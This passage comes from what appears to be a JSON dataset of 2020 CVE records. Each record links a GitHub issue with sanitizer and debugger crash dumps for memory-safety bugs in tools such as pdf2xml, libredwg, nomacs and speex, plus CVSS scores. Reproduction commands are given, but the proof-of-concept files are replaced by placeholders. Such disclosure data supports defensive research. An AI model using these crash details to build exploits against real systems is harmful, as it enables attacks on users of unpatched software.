mov rax,QWORD PTR [rb NUMBERTAG RIP NUMBERTAG ffffffffcd4b4f NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffffd1c NUMBERTAG a NUMBERTAG a1 APITAG test r NUMBERTAG d,r NUMBERTAG d) R NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG dd NUMBERTAG dc NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b NUMBERTAG f1f1f1f NUMBERTAG R NUMBERTAG dd NUMBERTAG dc NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4b4f NUMBERTAG stack NUMBERTAG fffffffda NUMBERTAG f2f0a ( APITAG : mov rax,QWORD PTR [rb NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffda NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_height NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : push rbp NUMBERTAG fffffffda 
NUMBERTAG a NUMBERTAG fffffffdaa NUMBERTAG c NUMBERTAG fffffffdaa NUMBERTAG fffffffdab NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4b4f NUMBERTAG in ?? () We ensured there is a heap overflow because of the dangerous using of the int pointer array variable yuv_datbuf This is the analysis of line NUMBERTAG and the analysis of line NUMBERTAG is similar, so we do not dump the detail analysis. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG ffjpeg d APITAG URLTAG",
  56494. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56495. "severity": "MEDIUM",
  56496. "baseScore": 5.5,
  56497. "impactScore": 3.6,
  56498. "exploitabilityScore": 1.8
  56499. },
  56500. {
  56501. "CVE_ID": "CVE-2020-23861",
  56502. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/248",
  56503. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/248",
  56504. "Repo_new": "libredwg/libredwg",
  56505. "Issue_Created_At": "2020-07-18T12:19:50Z",
  56506. "description": "APITAG \"read_system_page\" function heap overflow vulnerability. APITAG \"read_system_page\" function heap overflow vulnerability Description: There is a heap overflow function bug in \"read_system_page\" function at PATHTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a dwg file. This bug is caused by the following dangerous memcpy calling in read_system_page function: line NUMBERTAG if\u00a0(size_comp\u00a0 APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Then, we used GDB to debug this bug, the GDB outputs: GDB [ registers ] RA NUMBERTAG ffff2c6a1e NUMBERTAG ffff6fed NUMBERTAG APITAG : dec DWORD PTR [rcx+rc NUMBERTAG RB NUMBERTAG f RC NUMBERTAG RD NUMBERTAG CODETAG ') R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rdi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rsi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rdx,r NUMBERTAG 
ffff6fed NUMBERTAG a APITAG : call NUMBERTAG ffff6be NUMBERTAG APITAG NUMBERTAG ffff6fed NUMBERTAG f APITAG : mov rdi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : call NUMBERTAG ffff6be NUMBERTAG e0 APITAG NUMBERTAG ffff6fed NUMBERTAG APITAG : jmp NUMBERTAG ffff6fed NUMBERTAG a APITAG NUMBERTAG ffff6fed NUMBERTAG APITAG : lea rdi,[rip NUMBERTAG d9a NUMBERTAG c NUMBERTAG ffff7d NUMBERTAG c Guessed arguments: arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG CODETAG NUMBERTAG fffffffc NUMBERTAG ffffffffffffff NUMBERTAG fffffffc NUMBERTAG fffffffcc NUMBERTAG f [ ] Legend: code, data, rodata, value NUMBERTAG ffff6fed NUMBERTAG a NUMBERTAG memcpy (data, pedata, size_uncomp); gdb peda$ APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e7e NUMBERTAG bp NUMBERTAG fffffffc NUMBERTAG sp NUMBERTAG fffffffbbb0 READ of size NUMBERTAG at NUMBERTAG thread T0 APITAG process NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG process NUMBERTAG is executing new program: PATHTAG Error in re setting breakpoint NUMBERTAG No symbol table is loaded. Use the \"file\" command. Warning: Cannot insert breakpoint NUMBERTAG Cannot access memory at address NUMBERTAG c NUMBERTAG We ensured there is a heap overflow vulnerability because of the dangerous using of memcpy function, attacker can use this bug to finish a APITAG attack. You can reproduce this heap overflow vulnerability by the follow step: /dwg2dxf m b APITAG URLTAG",
  56507. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56508. "severity": "MEDIUM",
  56509. "baseScore": 5.5,
  56510. "impactScore": 3.6,
  56511. "exploitabilityScore": 1.8
  56512. },
  56513. {
  56514. "CVE_ID": "CVE-2020-23872",
  56515. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/10",
  56516. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/10",
  56517. "Repo_new": "kermitt2/pdf2xml",
  56518. "Issue_Created_At": "2020-07-06T01:52:41Z",
  56519. "description": "NULL pointer dereference APITAG APITAG $ gdb ./pdf2xml (gdb) r NUMBERTAG NULL pointer dereference APITAG APITAG FILETAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG e NUMBERTAG b in APITAG (state NUMBERTAG a NUMBERTAG a0, this NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG APITAG = APITAG (gdb) bt NUMBERTAG e NUMBERTAG b in APITAG (state NUMBERTAG a NUMBERTAG a0, this NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG APITAG (this=<optimized out>, state NUMBERTAG a NUMBERTAG a0) at PATHTAG NUMBERTAG b in APITAG (this=this APITAG cmd=cmd APITAG APITAG APITAG at PATHTAG NUMBERTAG a4f in Gfx::go (this=this APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in Gfx::display (this=this APITAG APITAG APITAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG a NUMBERTAG f0, out NUMBERTAG eae0, out APITAG hDPI NUMBERTAG hDPI APITAG vDPI NUMBERTAG APITAG NUMBERTAG rotate=<optimized out>, rotate APITAG APITAG crop=crop APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG af in Page::display (this=<optimized out>, out=out APITAG APITAG APITAG NUMBERTAG rotate=rotate APITAG APITAG crop=crop APITAG printing=printing APITAG APITAG APITAG at PATHTAG NUMBERTAG ffb in APITAG (this=this APITAG out NUMBERTAG out APITAG page=page APITAG hDPI NUMBERTAG hDPI APITAG APITAG NUMBERTAG DPI APITAG rotate NUMBERTAG rotate APITAG APITAG crop=crop APITAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG e in APITAG (this=this APITAG out=out APITAG APITAG APITAG APITAG APITAG rotate=rotate APITAG APITAG crop NUMBERTAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG b in APITAG (this=this APITAG out=out APITAG APITAG APITAG APITAG APITAG APITAG rotate=rotate APITAG APITAG crop NUMBERTAG APITAG APITAG APITAG at PATHTAG NUMBERTAG in main (argc NUMBERTAG argv=<optimized out>) at PATHTAG (gdb NUMBERTAG i $rip NUMBERTAG e NUMBERTAG b APITAG NUMBERTAG mo NUMBERTAG 
fc(%rcx),%esi NUMBERTAG e2a1 APITAG NUMBERTAG mov %esi NUMBERTAG rb NUMBERTAG e2a7 APITAG NUMBERTAG callq NUMBERTAG fa0 APITAG NUMBERTAG e2ac APITAG NUMBERTAG mo NUMBERTAG rbx),%rdi NUMBERTAG e2b3 APITAG NUMBERTAG lea NUMBERTAG rdi),%r NUMBERTAG e2b7 APITAG NUMBERTAG mov %r NUMBERTAG rb NUMBERTAG e2be APITAG NUMBERTAG mo NUMBERTAG rdi),%r NUMBERTAG e2c2 APITAG NUMBERTAG lea NUMBERTAG r9),%r NUMBERTAG e2c9 APITAG NUMBERTAG mov %r NUMBERTAG rb NUMBERTAG e2d0 APITAG NUMBERTAG add NUMBERTAG fc,%r9 (gdb) p/x $rc NUMBERTAG ref: URLTAG",
  56520. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  56521. "severity": "HIGH",
  56522. "baseScore": 7.5,
  56523. "impactScore": 3.6,
  56524. "exploitabilityScore": 3.9
  56525. },
  56526. {
  56527. "CVE_ID": "CVE-2020-23873",
  56528. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/11",
  56529. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/11",
  56530. "Repo_new": "kermitt2/pdf2xml",
  56531. "Issue_Created_At": "2020-07-06T01:58:25Z",
  56532. "description": "Heap buffer overflow APITAG dump. $ ./pdf2xml FILETAG test.xml APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG fb7e NUMBERTAG d9f5 bp NUMBERTAG ffc8a9d8c NUMBERTAG sp NUMBERTAG ffc8a9d NUMBERTAG f0 WRITE of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG fb7e NUMBERTAG d9f4 in __interceptor_vsprintf ( PATHTAG NUMBERTAG fb7e NUMBERTAG dcc9 in __interceptor_sprintf ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG a in APITAG , double, double, int, int, int, int, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG d in APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG de8 in APITAG , APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG fb7e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG ref: URLTAG",
  56533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56534. "severity": "CRITICAL",
  56535. "baseScore": 9.8,
  56536. "impactScore": 5.9,
  56537. "exploitabilityScore": 3.9
  56538. },
  56539. {
  56540. "CVE_ID": "CVE-2020-23874",
  56541. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/12",
  56542. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/12",
  56543. "Repo_new": "kermitt2/pdf2xml",
  56544. "Issue_Created_At": "2020-07-06T02:02:32Z",
  56545. "description": "Heap buffer overflow APITAG $ ./pdf2xml FILETAG FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a at pc NUMBERTAG f NUMBERTAG e NUMBERTAG f5 bp NUMBERTAG fffaa6b NUMBERTAG sp NUMBERTAG fffaa6b2da0 WRITE of size NUMBERTAG at NUMBERTAG a thread T NUMBERTAG f NUMBERTAG e NUMBERTAG f4 in __interceptor_vsprintf ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG cc9 in __interceptor_sprintf ( PATHTAG NUMBERTAG e3d in APITAG , APITAG , double&, double&, double&, double&, double&, double&) PATHTAG NUMBERTAG c7c in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG a in APITAG , double, double, int, int, int, int, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG d in APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG de8 in APITAG , APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG ref: URLTAG",
  56546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56547. "severity": "CRITICAL",
  56548. "baseScore": 9.8,
  56549. "impactScore": 5.9,
  56550. "exploitabilityScore": 3.9
  56551. },
  56552. {
  56553. "CVE_ID": "CVE-2020-23876",
  56554. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/14",
  56555. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/14",
  56556. "Repo_new": "kermitt2/pdf2xml",
  56557. "Issue_Created_At": "2020-07-06T03:02:05Z",
  56558. "description": "Memory leaks APITAG APITAG $ ./pdf2xml NUMBERTAG Memory FILETAG test.xml APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG d2f NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a9 in APITAG , double, double, double, double) PATHTAG NUMBERTAG d in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a6c in APITAG int) PATHTAG NUMBERTAG ec5 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e in APITAG , double, double, int, int, int, int, int ( )(void ), void ) PATHTAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG e NUMBERTAG f in strdup ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG , int, int, int, int, double, double, int, APITAG , double, int, int) PATHTAG NUMBERTAG fc in APITAG , double, double) PATHTAG NUMBERTAG c9 in APITAG , double, double, double, double, unsigned int, int, unsigned int , int) PATHTAG NUMBERTAG in APITAG , double, double, double, double, double, double, unsigned int, int, unsigned int , int) PATHTAG NUMBERTAG b1 in APITAG ) PATHTAG ref: URLTAG FILETAG",
  56559. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  56560. "severity": "HIGH",
  56561. "baseScore": 7.5,
  56562. "impactScore": 3.6,
  56563. "exploitabilityScore": 3.9
  56564. },
  56565. {
  56566. "CVE_ID": "CVE-2020-23877",
  56567. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/15",
  56568. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/15",
  56569. "Repo_new": "kermitt2/pdf2xml",
  56570. "Issue_Created_At": "2020-07-06T03:05:26Z",
  56571. "description": "Stack buffer overflow APITAG APITAG $ gdb ./pdf2xml (gdb) r FILETAG test.xml FILETAG",
  56572. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56573. "severity": "CRITICAL",
  56574. "baseScore": 9.8,
  56575. "impactScore": 5.9,
  56576. "exploitabilityScore": 3.9
  56577. },
  56578. {
  56579. "CVE_ID": "CVE-2020-23878",
  56580. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/45",
  56581. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/45",
  56582. "Repo_new": "flexpaper/pdf2json",
  56583. "Issue_Created_At": "2020-07-09T09:56:14Z",
  56584. "description": "Stack buffer overflow APITAG fetch. $ ./pdf2json FILETAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffc9d6bcfe0 (pc NUMBERTAG f2cf5cba NUMBERTAG e bp NUMBERTAG sp NUMBERTAG ffc9d6bcfd0 T NUMBERTAG f2cf5cba NUMBERTAG d ( PATHTAG NUMBERTAG f2cf5cb9d NUMBERTAG PATHTAG NUMBERTAG f2cf5c2cf4f ( PATHTAG NUMBERTAG f2cf5ca NUMBERTAG fe in operator new(unsigned long) ( PATHTAG NUMBERTAG c4 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG NUMBERTAG d6 in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , int) PATHTAG ref: URLTAG FILETAG",
  56585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56586. "severity": "CRITICAL",
  56587. "baseScore": 9.8,
  56588. "impactScore": 5.9,
  56589. "exploitabilityScore": 3.9
  56590. },
  56591. {
  56592. "CVE_ID": "CVE-2020-23879",
  56593. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/44",
  56594. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/44",
  56595. "Repo_new": "flexpaper/pdf2json",
  56596. "Issue_Created_At": "2020-07-09T09:51:29Z",
  56597. "description": "NULL pointer dereference APITAG APITAG $ ./pdf2json FILETAG Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG bp NUMBERTAG ffe1f9cf NUMBERTAG sp NUMBERTAG ffe1f9cf5b8 T NUMBERTAG f5f in APITAG int, Object ) PATHTAG NUMBERTAG ec in APITAG int, Object ) PATHTAG NUMBERTAG in APITAG , Object ) PATHTAG NUMBERTAG in APITAG ) PATHTAG NUMBERTAG fe0 in APITAG , APITAG ) PATHTAG NUMBERTAG b in APITAG , APITAG , APITAG , void ) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd2eaec NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG int, Object NUMBERTAG ABORTING ref: URLTAG FILETAG",
  56598. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  56599. "severity": "HIGH",
  56600. "baseScore": 7.5,
  56601. "impactScore": 3.6,
  56602. "exploitabilityScore": 3.9
  56603. },
  56604. {
  56605. "CVE_ID": "CVE-2020-23884",
  56606. "Issue_Url_old": "https://github.com/nomacs/nomacs/issues/516",
  56607. "Issue_Url_new": "https://github.com/nomacs/nomacs/issues/516",
  56608. "Repo_new": "nomacs/nomacs",
  56609. "Issue_Created_At": "2020-07-09T11:28:59Z",
  56610. "description": "Open a malformed mng format file, buffer overflow and memory corruption will occur.. Two issues were found in nomacs in all versions. nomacs does not handle the mng file format very well. When nomacs opens a carefully constructed mng file, nomacs will have a buffer overflow and crash NUMBERTAG buffer overflow APITAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ea NUMBERTAG eb NUMBERTAG ec NUMBERTAG ffffc NUMBERTAG ed NUMBERTAG d NUMBERTAG esi NUMBERTAG fd NUMBERTAG edi NUMBERTAG d NUMBERTAG eip NUMBERTAG edc NUMBERTAG b esp NUMBERTAG a7f NUMBERTAG ebp NUMBERTAG iopl NUMBERTAG nv up ei pl nz na pe nc cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG ERROR: Symbol file could not be found. Defaulted to export symbols for PATHTAG qmng NUMBERTAG b NUMBERTAG edc NUMBERTAG b f3ab rep stos dword ptr es:[edi NUMBERTAG exploitable v !exploitable NUMBERTAG APITAG Executing Processor Architecture is NUMBERTAG Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address NUMBERTAG d NUMBERTAG First Chance Exception Type: STATUS_ACCESS_VIOLATION APITAG Exception Sub Type: Write Access Violation Faulting Instruction NUMBERTAG edc NUMBERTAG b rep stos dword ptr es:[edi] Exception Hash APITAG APITAG Hash Usage : Stack Trace: APITAG : qmng NUMBERTAG b Instruction Address NUMBERTAG edc NUMBERTAG b Description: User Mode Write AV Short Description: APITAG Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable User Mode Write AV starting at qmng NUMBERTAG b APITAG User mode write access violations that are not near NULL are exploitable. APITAG NUMBERTAG memory corruption APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. 
This exception may be expected and handled. ea NUMBERTAG e8e1 eb NUMBERTAG ec NUMBERTAG ed NUMBERTAG esi NUMBERTAG edi NUMBERTAG eip NUMBERTAG edbd NUMBERTAG esp NUMBERTAG aef3c4 ebp NUMBERTAG a NUMBERTAG iopl NUMBERTAG nv up ei ng nz na po cy cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG ERROR: Symbol file could not be found. Defaulted to export symbols for PATHTAG qmng NUMBERTAG d NUMBERTAG edbd NUMBERTAG e mov byte ptr [esi],cl ds NUMBERTAG exploitable v !exploitable NUMBERTAG APITAG Executing Processor Architecture is NUMBERTAG Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address NUMBERTAG First Chance Exception Type: STATUS_ACCESS_VIOLATION APITAG Exception Sub Type: Write Access Violation Faulting Instruction NUMBERTAG edbd NUMBERTAG mov byte ptr [esi],cl Basic Block NUMBERTAG edbd NUMBERTAG mov byte ptr [esi],cl Tainted Input operands: 'cl','esi NUMBERTAG edbd NUMBERTAG movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG a mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG d movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG movzx ecx,byte ptr [ea NUMBERTAG edbd NUMBERTAG mov byte ptr [esi NUMBERTAG cl NUMBERTAG edbd NUMBERTAG b mov ecx,dword ptr [ebp NUMBERTAG h NUMBERTAG edbd NUMBERTAG add edx,ec NUMBERTAG edbd NUMBERTAG add ea NUMBERTAG edbd NUMBERTAG lea esi,[esi+ec NUMBERTAG edbd NUMBERTAG cmp edx,dword ptr [ebp NUMBERTAG h NUMBERTAG edbd NUMBERTAG f jl qmng NUMBERTAG d NUMBERTAG edbd NUMBERTAG Exception Hash APITAG APITAG Hash Usage : Stack Trace: APITAG : qmng NUMBERTAG d NUMBERTAG APITAG : qmng NUMBERTAG d Instruction Address NUMBERTAG edbd NUMBERTAG Description: User Mode Write AV near NULL Short Description: APITAG Exploitability Classification: UNKNOWN Recommended Bug Title: User Mode Write AV near NULL starting at qmng NUMBERTAG d NUMBERTAG APITAG User mode 
write access violations that are near NULL are unknown.",
  56611. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56612. "severity": "MEDIUM",
  56613. "baseScore": 5.5,
  56614. "impactScore": 3.6,
  56615. "exploitabilityScore": 1.8
  56616. },
  56617. {
  56618. "CVE_ID": "CVE-2020-23903",
  56619. "Issue_Url_old": "https://github.com/xiph/speex/issues/13",
  56620. "Issue_Url_new": "https://github.com/xiph/speex/issues/13",
  56621. "Repo_new": "xiph/speex",
  56622. "Issue_Created_At": "2020-07-13T04:52:03Z",
  56623. "description": "speexenc encode wav file dos vulnerability. when speexenc encode wav file , deal with channels NUMBERTAG will generate a Division by zero error which will cause the software crash FILETAG usage : speexenc sample vulnerability function: static int read_samples(FILE fin,int frame_size, int bits, int channels, int lsb, short input, char buff, spx_int NUMBERTAG t size) { unsigned char in[MAX_FRAME_BYTES NUMBERTAG int i; short s; int nb_read; size_t to_read; if (size && size NUMBERTAG return NUMBERTAG to_read = bits NUMBERTAG channels frame_size;",
  56624. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56625. "severity": "MEDIUM",
  56626. "baseScore": 5.5,
  56627. "impactScore": 3.6,
  56628. "exploitabilityScore": 1.8
  56629. },
  56630. {
  56631. "CVE_ID": "CVE-2020-23904",
  56632. "Issue_Url_old": "https://github.com/xiph/speex/issues/14",
  56633. "Issue_Url_new": "https://github.com/xiph/speex/issues/14",
  56634. "Repo_new": "xiph/speex",
  56635. "Issue_Created_At": "2020-07-14T03:07:21Z",
  56636. "description": "speexenc stack buffer overflow. I have found a stack buffer overflow vulnerability in speexenc; this may cause RCE by opening a crafted wav file FILETAG the vulnerable function: APITAG } else { nb_read = fread(in NUMBERTAG to_read,fin);",
  56637. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56638. "severity": "MEDIUM",
  56639. "baseScore": 5.5,
  56640. "impactScore": 3.6,
  56641. "exploitabilityScore": 1.8
  56642. },
  56643. {
  56644. "CVE_ID": "CVE-2020-23907",
  56645. "Issue_Url_old": "https://github.com/avast/retdec/issues/637",
  56646. "Issue_Url_new": "https://github.com/avast/retdec/issues/637",
  56647. "Repo_new": "avast/retdec",
  56648. "Issue_Created_At": "2019-09-04T12:18:20Z",
  56649. "description": "Bug in bin2llvmir Decoder. I try to translate the following PE file: FILETAG But in the decoder phase, the retdec just gets an error and exits: APITAG The problem is in file APITAG , function ERRORTAG , line NUMBERTAG and line NUMBERTAG two portions of code: CODETAG The problem here is, if up equals to APITAG , the APITAG will crash, the possible fix is: CODETAG After this fix, the Decoder works well: APITAG",
  56650. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56651. "severity": "CRITICAL",
  56652. "baseScore": 9.8,
  56653. "impactScore": 5.9,
  56654. "exploitabilityScore": 3.9
  56655. },
  56656. {
  56657. "CVE_ID": "CVE-2020-23912",
  56658. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/540",
  56659. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/540",
  56660. "Repo_new": "axiomatic-systems/bento4",
  56661. "Issue_Created_At": "2020-08-01T02:45:57Z",
  56662. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), mp NUMBERTAG aac (latest master NUMBERTAG b NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG PATHTAG o /dev/null Output APITAG APITAG output ERRORTAG POC FILETAG",
  56663. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56664. "severity": "MEDIUM",
  56665. "baseScore": 5.5,
  56666. "impactScore": 3.6,
  56667. "exploitabilityScore": 1.8
  56668. },
  56669. {
  56670. "CVE_ID": "CVE-2020-23914",
  56671. "Issue_Url_old": "https://github.com/yhirose/cpp-peglib/issues/121",
  56672. "Issue_Url_new": "https://github.com/yhirose/cpp-peglib/issues/121",
  56673. "Repo_new": "yhirose/cpp-peglib",
  56674. "Issue_Created_At": "2020-08-07T10:34:08Z",
  56675. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), peglint (latest master NUMBERTAG f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG ast opt APITAG PATHTAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
